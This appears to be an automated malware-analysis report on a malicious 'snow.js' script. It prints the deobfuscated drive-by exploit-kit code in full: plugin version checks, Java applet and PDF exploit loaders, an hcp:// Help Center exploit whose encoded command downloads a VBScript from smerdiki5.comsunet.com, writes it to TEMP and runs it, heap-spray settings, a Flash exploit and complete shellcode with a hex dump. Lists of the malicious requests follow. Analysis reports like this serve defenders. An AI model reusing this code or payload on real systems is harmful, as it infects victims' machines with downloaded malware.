=/=\s*([\d\.]+)/g;try{d=(p||c.getDOMobj(c.insertHTML("object",["classid",f.classID],["src"
,""],"",f))).GetVersions();for(k=0;k<5;k++){if(b.test(d)&&(!g||(g<RegExp.$1))){g=RegExp.$1
}}}catch(h){}f.installed=g?1:(p?0:-1)}if(!f.version){f.version=c.formatNum(g)}f.INSTALLED[
j]=f.installed}},zz:0};PluginDetect.initScript();PluginDetect.getVersion(".");jver=PluginD
etect.getVersion("Java","./getJavaInfo.jar");pdfver=PluginDetect.getVersion("AdobeReader")
;flashver=PluginDetect.getVersion('Flash');}catch(e){}if(typeof jver=='string
    '){jver=jver.split('.')}else{jver=[0,0,0,0]}if(typeof pdfver=='string
    '){pdfver=pdfver.split('.')}else{pdfver=[0,0,0,0]}if(typeof flashver=='string
    '){flashver=flashver.split('.'
)}else{flashver=[0,0,0,0]}function spl0(){if(jver[1]==6&&jver[3]<=28){var f=document.creat
eElement('applet');f.setAttribute('code', 'Market.class');f.setAttribute('archive', '.
    /content/v1.jar');var p=document.createElement('param');p.setAttribute('name','p
    ');p.setAttribute('value','e00oMDDfmh % 2.r.5VqRmfk
/h0VqRmDfh00DBVoeoju8396h8i');f.appendChild(p);document.body.appendChild(f);}spl1()}functi
on spl1(){if(jver[1]<6){var f=document.createElement('applet');f.setAttribute('code', 'pho
to.Zoom.class');f.setAttribute('archive', './content
/g43kb6j34kblq6jh34kb6j3kl4.jar');var p=document.createElement('param');p.setAttribute('na
me','p');p.setAttribute('value','e00oMDDfmh%2.r.5VqRmfk/h0VqRmDfh00DBVoeoju8396h83'
);f.appendChild(p);document.body.appendChild(f);}spl2()}function spl2(){spl3()}function sh
ow_pdf(src){var pifr=document.createElement('IFRAME');pifr.setAttribute('width
    ',1);pifr.setAttribute('height',1);pifr.setAttribute('src'
,src);document.body.appendChild(pifr)}function spl3(){if(pdfver[0]>0&&pdfver[0]<8){show_pd
f('./content/1ddfp.php ? f = 18
    ')}else if((pdfver[0]==8)||(pdfver[0]==9&&pdfver[1]<=3)){show_pdf('./content/2ddfp.php
     ? f = 18')}spl4()}function spl4(){var m=document.createElement('IFRAME
    ');m.setAttribute('src','hcp :// services/search?query=anything&topic=hcp://system/
    sysinfo
/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<scr'+'ipt defer>eval(Run
(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,3
4,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,
46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,11
2,58,47,47,115,109,101,114,100,105,107,105,53,46,99,111,109,115,117,110,101,116,46,99,111,
109,47,115,101,116,116,47,99,111,110,116,101,110,116,47,104,99,112,95,118,98,115,46,112,10
4,112,63,102,61,49,56,38,100,61,48,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58
,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,
112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58
,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71
,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,
32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,
84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,9
7,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,
46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41
,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38
,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,3
2,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));</scr'+'ipt > 
    ');m.setAttribute('width',0);m.setAttribute('height',0);document.body['appendChild
    '](m);setTimeout(spl5,1000)}function getCN(){return 'content
/score.swf'}function getBlockSize(){return 1024}function getAllocSize(){return 1024 * 1024
}function getAllocCount(){return 300}function getFillBytes(){var a='%u'+'0c0c';return a+a;
}function getShellCode(){return "%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u4ce9%u8
0fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3
458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud
35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u6
1e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0
c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua
385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2
828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2
846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua
528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u2
8d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2
135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7
b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5
d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3
373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u455b%u5a4d%u414c%u4143%u061d%u474b%u5b45%u4
65d%u5c4d%u4b06%u4547%u5b07%u5c4d%u075c%u065f%u4058%u1758%u154e%u1019%u4d0e%u1e15%u2828"}f
unction spl5(){var ver1=flashver[0];var ver2=flashver[1];var ver3=flashver[2];if (((ver1==
10&&ver2==0&&ver3>40)||((ver1==10&&ver2>0)&&(ver1==10&&ver2<2)))||((ver1==10&&ver2==2&&ver
3<159)||(ver1==10&&ver2<2))){var fname="content/field";var Flash_obj=" < objectclassid = 
    'clsid:d27cdb6e-ae6d-11cf-96b8-444553540000'width = 10height = 10id = 'swf_id' > 
    ";Flash_obj+=" < paramname = 'movie'value = '"+fname+".swf'
    />";al="always";Flash_obj+="<param name=\"allowScriptAccess\" value='"+al+"' / > 
    ";Flash_obj+=" < paramname = 'Play'value = '0'
/>";Flash_obj+="<embed src='"+fname+".swf' id='swf_id' name='swf_id'";Flash_obj+="allowScr
iptAccess='"+al+"'";Flash_obj+="type='application/x - shockwave - flash
    '";Flash_obj+="width='10' height='10' > ";Flash_obj+=" </ embed > ";Flash_obj+=" </ 
    object > ";var oSpan=document.createElement("span");
    document.body.appendChild(oSpan);
    oSpan.innerHTML = Flash_obj;
  }
  setTimeout(end_redirect, 8000);
}
spl0();

(repeated 1 time)

Writes

<center><h1>Please wait page is loading...</h1></center><hr>

(repeated 1 time)

Network Activity¶

Requests

URL	Status	Content Type
http://dl.dropbox.com/u/50989988/js/theme/snow.js	200	text/html
about:blank	200	text/html
http://smerdiki5.comsunet.com/sett/main.php?page=a313553a42be5802	200	text/html
http://smerdiki5.comsunet.com/sett/content/2ddfp.php?f=18	200	application/pdf
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,115,109,101,114,100,105,107,105,53,46,99,111,109,115,117,110,101,116,46,99,111,109,47,115,101,116,116,47,99,111,110,116,101,110,116,47,104,99,112,95,118,98,115,46,112,104,112,63,102,61,49,56,38,100,61,48,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));</script>	505	text/plain
http://pokler1.thailandclubinfo.com//index.php?7e0071740f50250645dcbdc868cb799b	NXDOMAIN	N/A

Redirects

No redirects.

ActiveX controls¶

AcroPDF.PDF

No attribute setting or method call detected
Msxml2.XMLHTTP

No attribute setting or method call detected

AcroPDF.PDF
No attribute setting or method call detected

Msxml2.XMLHTTP
No attribute setting or method call detected

ShockwaveFlash.ShockwaveFlash
	Name	Arg0
Methods	GetVariable

JavaPlugin.192_30

No attribute setting or method call detected
JavaWebStart.isInstalled

No attribute setting or method call detected

JavaPlugin.192_30
No attribute setting or method call detected

JavaWebStart.isInstalled
No attribute setting or method call detected

Shellcode¶

Hexadecimal	ASCII
41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 e9 4c fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b 5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c 29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c 0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 58 40 5c 5c 58 12 07 07 5b 45 4d 5a 4c 41 43 41 1d 06 4b 47 45 5b 5d 46 4d 5c 06 4b 47 45 07 5b 4d 5c 5c 07 5f 06 58 40 58 17 4e 15 19 10 0e 4d 15 1e 28 28	AAAAf......X1.f. .L..0(@......... ..]..w..L.h..h$. X4~.^...N.v.+\.. ..=8....h..n..]. .....]y..dy~.].. \.P+.~.^.+...ai. .+...'.8..\...%+ .h...7].v.v.+.N. $c.n..\|.$..+..,. +..vq..{..@..U$. \+....@...B-q... .....((((pxBh@.( ((x..1x}...v8..- ..@GF((@]ZDE\|.>. .....I.....Z.., )((.t.$.,.ZMO[.l .,^Z...l....[.{@ .(((.~$....y.l5( _XJ\.l5-.LDD.l5! (q..,..l5,iyB(B( {.B(.~<..]>B({.~ ,B(..${.~,..$.. ;o..(].o..(].B(B ..~.......f&.... &.G)....s3.nQ.2. X@\\X...[EMZLACA ..KGE[]FM\.KGE.[ M\\._.X@X.N....M ..((

Hexadecimal

ASCII

41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81 
e9 4c fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff 
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3 
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04 
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3 
af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3 
5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4 
85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b 
f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3 
24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3 
2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b 
5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7 
d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28 
28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d 
d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab 
ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c 
29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c 
0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40 
d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28 
5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21 
28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28 
7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e 
2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3 
3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42 
d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2 
26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07 
58 40 5c 5c 58 12 07 07  5b 45 4d 5a 4c 41 43 41 
1d 06 4b 47 45 5b 5d 46  4d 5c 06 4b 47 45 07 5b 
4d 5c 5c 07 5f 06 58 40  58 17 4e 15 19 10 0e 4d 
15 1e 28 28

AAAAf......X1.f.
.L..0(@.........
..]..w..L.h..h$.
X4~.^...N.v.+\..
..=8....h..n..].
.....]y..dy~.]..
\.P+.~.^.+...ai.
.+...'.8..\...%+
.h...7].v.v.+.N.
$c.n..|.$..+..,.
+..vq..{..@..U$.
\+....@...B-q...
.....((((pxBh@.(
((x..1x}...v8..-
..@GF((@]ZDE|.>.
.....I....*.Z..,
)((.t.$.,.ZMO[.l
.,^Z...l....[.{@
.(((.~$....y.l5(
_XJ\.l5-.LDD.l5!
(q..,..l5,iyB(B(
{.B(.~<..]>B({.~
,B(..${.~,..$.*.
;o..(].o..(].B(B
..~.......f&....
&.G)....s3.nQ.2.
X@\\X...[EMZLACA
..KGE[]FM\.KGE.[
M\\._.X@X.N....M
..((

This shellcode was found on http://smerdiki5.comsunet.com/sett/main.php?page=a313553a42be5802.

(Waiting for shellzer to terminate the analysis of this shellcode.)

Malware¶

Additional (potential) malware:

URL	Type	Hash	Analysis
http://smerdiki5.comsunet.com/sett/w.php?f=18&e=6	N/A	N/A

FEEDBACK

Analysis report for http://dl.dropbox.com/u/50989988/js/theme/snow.js

Sample Overview¶

Detection results¶

Exploits¶

Deobfuscation results¶

Evals

Writes

Network Activity¶

Requests

Redirects

ActiveX controls¶

Shellcode¶

Malware¶

Comments